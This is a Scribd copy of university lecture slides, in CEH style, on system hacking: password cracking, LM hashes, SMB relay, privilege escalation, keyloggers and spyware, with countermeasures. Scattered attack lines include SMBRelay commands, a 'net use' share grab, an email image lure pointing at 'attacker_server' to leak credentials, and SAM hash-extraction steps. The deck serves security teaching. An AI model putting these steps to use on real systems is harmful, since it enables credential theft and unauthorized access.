KEMBAR78
Module8 Systemhacking 091013102853 Phpapp02 | PDF | Password | Security Engineering
Scribd
Upload
91 views83 pages

Module8 Systemhacking 091013102853 Phpapp02

The document discusses various techniques for cracking passwords, including offline and online attacks, and tools used for password cracking. Specific topics covered include password sniffing, brute force cracking, dictionary attacks, rainbow tables, password hashes, and tools like RainbowCrack, LCP, and SMBRelay that can be used to perform password cracking. Countermeasures for password cracking like strong passwords, password hashing, and SMB signing are also mentioned.

Uploaded by

teh kotak
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
91 views83 pages

Module8 Systemhacking 091013102853 Phpapp02

The document discusses various techniques for cracking passwords, including offline and online attacks, and tools used for password cracking. Specific topics covered include password sniffing, brute force cracking, dictionary attacks, rainbow tables, password hashes, and tools like RainbowCrack, LCP, and SMBRelay that can be used to perform password cracking. Countermeasures for password cracking like strong passwords, password hashing, and SMB signing are also mentioned.

Uploaded by

teh kotak
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 83

MODULE 8

SYSTEM HACKING
Objective
 Password cracking
 Password attacks
 Identifying various password cracking tools
 Formulating countermeasures for password cracking
 Escalating privileges
 Executing applications
 Keyloggers and Spywares
 Spywares and keyloggers countermeasures
 Hiding files
 Understanding rootkits
 The use of Steganography
 Covering tracks
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 2/83
Module Flow

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 3/83


SYSTEM HACKING

CRACKING PASSWORDS
CEH Hacking Cycle

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 5/83


Password Types

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 6/83


Types of Password Attacks

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 7/83


Passive Online Attack: Wire Sniffing

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 8/83


Passive Online Attack: Man-in-the-
Middle and Replay Attacks
 Somehow get access to the communicationschannel
 Wait until the authentication sequence
 Proxy authentication-traffic
 No need to brute force

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 9/83


Active Online Attack: Password Guessing

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 10/83


Offline Attacks
 Offline attacks are time consuming
 LM Hashes are much more vulnerable due to smaller
key space and shorter length
 Web services are available
 Distributed password cracking techniques are available
 Mitigations:
 Use good passwords
 Remove LM Hashes
 Attacker has password database
 Password representations must be cryptographically
secure
 Considerations:
 Moore’s law
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 11/83
Offline Attacks (cont’d)

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 12/83


Offline Attack: Brute-force Attack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 13/83


Offline Attack: Pre-Computed Hashes

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 14/83


Syllable Attack/ Rule-based Attack/Hybrid Attack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 15/83


Distributed Network Attack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 16/83


Distributed Network Attack (cont’d)

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 17/83


Distributed Network Attack (cont’d)

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 18/83


Non-Technical Attacks

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 19/83


http://www.defaultpassword.com/

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 20/83


http://www.cirt.net/cgi-bin/passwd.pl

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 21/83


Password Mitigation

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 22/83


Administrator Password Guessing

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 23/83


Manual Password Cracking Algorithm

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 24/83


Automatic Password Cracking Algorithm

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 25/83


Performing Automated Password Guessing

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 26/83


Microsoft Authentication

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 27/83


NTLM and LM Authentication on the Wire

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 28/83


What is LAN Manager Hash

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 29/83


LM “Hash” Generation

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 30/83


LM Hash

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 31/83


Salting

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 32/83


PWdump2 and PWdump3

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 33/83


Tool: Rainbowcrack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 34/83


Password Sniffing
 Password guessing is a tough task
 Why not just sniff credentials off the wire as users log
in to a server and then replay them to gain access?
 If an attacker is able to eavesdrop on NT/2000 logins,
then this approach can spare lot of random guesswork

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 35/83


How to Sniff SMB Credentials

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 36/83


Sniffing Hashes Using LophtCrack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 37/83


Hacking Tool: NBTDeputy
 NBTDeputy register a NetBIOS computer name on the network
and is ready to respond to NetBT name-query requests.
 NBTdeputy helps to resolve IP address from NetBIOS computer
name. It's similar to Proxy ARP.
 This tool works well with SMBRelay.
 For example, SMBRelay runs on a computer as ANONYMOUS-
ONE and the IP address is 192.168.1.10 and NBTDeputy is also
ran and 192.168.1.10 is specified. SMBRelay may connect to
any XP or .NET server when the logon users access "My
Network Places"

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 38/83


Tool: ScoopLM

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 39/83


Hacking Tool: SMBRelay
 SMBRelay is essentially a SMB server that can capture
usernames and password hashes from incoming SMB
traffic.
 It can also perform man-in-the-middle (MITM) attacks.
 You must disable NetBIOS over TCP/IP and block
ports 139 and 445.
 Start the SMBRelay server and listen for SMB packets:
 c:\>smbrelay /e
 c:\>smbrelay /IL 2 /IR 2
 An attacker can access the client machine by simply
connecting to it via relay address using: c:\> net use
* \\<capture _ip>\c$
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 40/83
SMB Replay Attacks
 Trick client computer to request a connection
 Request connection to the client computer and collect
challenge
 Return challenge from client computer as own
challenge
 Wait for response from client computer
 Return response as own response
 Best way of fighting SMB replay attack is by enabling
SMB signing in security policy

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 41/83


SMB Replay Attacks

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 42/83


SMBRelay Man-in-the-Middle Scenario

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 43/83


Redirecting SMB Logon to the Attacker
 Eavesdropping on LM
responses becomes
much easier if the
attacker can trick the
victim to attempt
Windows authentication
of the attacker's choice
 The basic trick is to
send an email message
to the victim with an
embedded hyperlink to
a fraudulent SMB server
 When the hyperlink is
clicked, the user
unwittingly sends his
credentials over the
network img src=file://attacker_server/null.gif height=1 width=1.
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 44/83
Replay Attack Tool: SMBProxy
 A “Passing the Hash” tool that works as a proxy
 You can authenticate to a Windows NT4/2000 server
by knowing only the md4 hash
 You can mount shares and access the registry and
anything a particular user can do with his privileges
 It does not work with syskey enabled systems

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 45/83


Tool: LCP
 Main purpose of the LCP program is user account passwords
auditing and recovery in Windows NT/2000/XP/2003
 Features:
 Account information imports:

 Import from local computer


 Import from remote computer
 Import from SAM file
 Import from .LC file
 Import from .LCS file
 Import from PwDump file
 Import from Sniff file
 Passwords recovery:
 Dictionary attack
 Hybrid of dictionary and brute force attacks
 Brute force attack
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 47/83
LCP: Screenshot

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 48/83


Tool: Crack

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 49/83


Tool: Access PassView
 Access PassView tool reveals the database password of
every passwordprotected mdb file that was created with
Microsoft Access 95/97/2000/XP
 It can be useful if you have forgotten the Access Database
password and you want to recover it
 There are two ways of getting the password of the mdb
file:
 Drag & Drop

 Command-line

 Limitations:
 In Access 2000/XP files, this utility cannot recover

passwords that contain morethan 18 characters


 This utility shows only the main database password. It

cannot recover the user-level passwords


Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 50/83
Access PassView: Screenshot

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 51/83


Password Recovery Tool: MS Access
Database Password Decoder
 The ‘MS Access Database Password Decoder’ utility
was designed to decrypt the master password stored
in a Microsoft Access database

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 52/83


Tool: Asterisk Logger
 Asterisk Logger reveals passwords that are stored behind
the asterisks
 Features:
 Displays additional information about the revealed password
such as the date/time on which password was revealed, the
name of the application that contains the revealed password
box, and the executable file of the application
 Allows you to save the passwords to HTML file

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 53/83


Tool: Asterisk Key
 Asterisk Key shows passwords hidden under
asterisks
 Features:
 Uncovers hidden passwords on password dialog boxes
and web pages
 State-of-the-art password recovery engine: All
passwords are recovered instantly
 Supports multilingual passwords
 Full install/uninstall support

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 54/83


Tool: CHAOS Generator

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 55/83


Password Cracking Countermeasures
 Enforce 8-12 character alphanumeric passwords
 Set the password change policy to 30 days
 Physically isolate and protect the server
 Use SYSKEY utility to store hashes on disk
 Monitor the server logs for brute force attacks on user
accounts

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 56/83


Do Not Store LAN Manager Hash in SAM Database
 Instead of storing your user account password in
cleartext, Windows generates and stores user account
passwords by using two different password "hashes"
 When you set or change the password for a user
account to a password that contains fewer than 15
characters, Windows generate both LAN Manager
hash (LM hash) and Windows NT hash (NT hash) of
the password
 These hashes are stored in the local Security Accounts
Manager (SAM) database or in Active Directory
 The LM hash is relatively weak compared to the NT
hash and so it is prone to fast brute-force attack.
Therefore, you may want to prevent Windows from
storing an LM hash of your password
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 57/83
LM Hash Backward Compatibility
 Windows 2000-based servers and Windows Server
2003-based servers can authenticate users who
connect with computers that are running the earlier
versions of Windows
 Windows 95/98 clients do not use Kerberos for
authentication
 For backward compatibility, Windows 2000 and
Windows Server 2003 support:
 LAN Manager (LM) authentication
 Windows NT (NTLM) authentication
 NTLM version 2 (NTLMv2) authentication

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 58/83


LM Hash Backward Compatibility
 The NTLM, NTLMv2, and Kerberos all use the NT
hash, also known as the Unicode hash
 The LM authentication protocol uses the “LM hash”
 It is best to prevent storage of the LM hash if you do
not need it for backward compatibility. If your network
contains Windows 95, Windows 98, or Macintosh
clients, you may experience the following problems if
you prevent the storage of LM hashes

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 59/83


How to Disable LM HASH

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 60/83


SYSTEM HACKING

Escalating Privileges
Privilege Escalation

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 62/83


Cracking NT/2000 Passwords
 SAM file in Windows NT/2000 contains the user names
and encrypted passwords. The SAM file is located at
%systemroot%\system32\config directory
 The file is locked when the OS is running
 Booting to an alternate OS
 NTFSDOS (www.sysInternals.com) will mount any NTFS
partition as a logical drive
 Backup SAM from the Repair directory
 Whenever rdisk /s is run, a compressed copy of the
SAM called SAM._ is created in %systemroot%\repair
Expand this file using c:\>expand sam._sam
 Extract the hashes from the SAM
 Use LOphtcrack to hash the passwords
Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 63/83
Active@ Password Changer

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 64/83


Active@ Password Changer: Screenshots 1

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 65/83


Active@ Password Changer: Screenshots 2

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 66/83


Active@ Password Changer: Screenshots 3

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 67/83


Privilege Escalation Tool: x.exe
This tool, when
executed on
remote
systems,
creates a user
called “X” with
a password of
“X” and adds
the user to the
administrator’s
group

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 68/83


SYSTEM HACKING

Executing Applications
Tool: psexec
 Lets you execute processes on other systems remotely
 Launches interactive command prompts on remote systems

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 70/83


Tool: remoexec

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 71/83


Tool: Alchemy Remote Executor

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 72/83


Emsa FlexInfo Pro
 Emsa FlexInfo Pro is a system information and
diagnostics tool that allows you to access a system
details and settings
 It includes a real-time CPU and memory graph, as well
as CPU speed test and memory test tools
 It includes several useful networking utilities
(Bandwidth Monitor, Ping, Whois etc.) as well as an
atomic time synchronizer, a browser popup blocker,
and a basic keylogger

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 73/83


Emsa FlexInfo Pro: Screenshot

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 74/83


Keystroke Loggers
 If all other attempts to sniff out domain privileges fail,
then a keystroke logger is the solution
 Keystroke loggers are stealth software packages that
are placed between keyboard hardware and the
operating system, so that they can record every
keystroke
 There are two types of keystroke loggers
 Software-based
 Hardware-based

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 75/83


Revealer Keylogger
 Revealer Keylogger tool records keyboard inputs
 Revealer Keylogger's powerful log engine logs any
language on any keyboard and perfectly handles
dead-keys
 Features:
 Powerful log engine
 Full invisible mode
 Password protection
 Send log files via e-mail

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 76/83


Revealer Keylogger: Screenshot

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 77/83


Hacking Tool: Hardware Key Logger
 The Hardware Key Logger
is a tiny hardware device
that can be attached in
between a keyboard and
a computer.
 It keeps a record of all
key strokes typed on the
keyboard. The recording
process is totally
transparent to the end
user.

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 78/83


Hardware Keylogger: Output

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 79/83


What is Spyware?
 Spyware is a program that records computer activities
on a machine
 Records keystrokes
 Records email messages
 Records IM chat sessions
 Records websites visited
 Records applications opened
 Captures screenshots

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 80/83


Spyware: Spector
 Spector is spyware that records everything that one
does on the Internet
 Spector automatically takes hundreds of snapshots
every hour, like a surveillance camera
 Spector works by taking a snapshot of whatever is on
the computer screen and saves it away in a hidden
location on the system’s hard drive

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 81/83


Keylogger Countermeasures
 Install Antivirus software and keep the signatures up
to date
 Install a Host-based IDS such as Cisco CSA agent
which can monitor your system and disable the
installation of keyloggers
 Keep your hardware systems secure in a locked
environment
 Frequently check the keyboard cables for attached
connectors

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 82/83


Anti-Keylogger
 This tool can detect keylogger installations and
remove them

Khoa CNTT – ĐH Nông Lâm TP. HCM 2008 83/83

You might also like